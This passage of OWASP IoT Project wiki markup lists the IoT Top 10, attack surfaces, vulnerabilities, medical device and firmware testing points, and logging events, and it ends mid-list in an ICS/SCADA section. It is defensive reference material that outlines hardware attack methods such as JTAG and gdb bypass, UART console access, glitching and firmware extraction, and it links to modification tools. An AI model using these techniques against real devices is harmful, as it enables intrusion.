* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak Guessable, or Hardcoded Passwords<br />
<br />
* I2 Insecure Network Services<br />
<br />
* I3 Insecure Ecosystem Interfaces<br />
<br />
* I4 Lack of Secure Update Mechanism<br />
<br />
* I5 Use of Insecure or Outdated Components<br />
<br />
* I6 Insufficient Privacy Protection<br />
<br />
* I7 Insecure Data Transfer and Storage<br />
<br />
* I8 Lack of Device Management<br />
<br />
* I9 Insecure Default Settings<br />
<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Verify for old sw versions and possible attacks (Heartbleed, Shellshock, old PHP versions etc)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physicall)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented however it is improperly configured or is not being properly updated, e.g. using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* Service can be attacked in a way that denies service to that service or the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting a OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in a adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Ensure supported and up-to-date software is used by developers<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file systems for sensitive of interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
=ICS/SCADA=<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
==ICS/SCADA Project==<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
{| class="wikitable" border="1" style="text-align: left"<br />
!Rank and ID<br />
!Title<br />
|-<br />
|'''1 - CWE-119'''<br />
|<br />
*Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|-<br />
|'''2 - CWE-20'''<br />
|<br />
*Improper Input Validation<br />
|-<br />
|'''3 - CWE-22'''<br />
|<br />
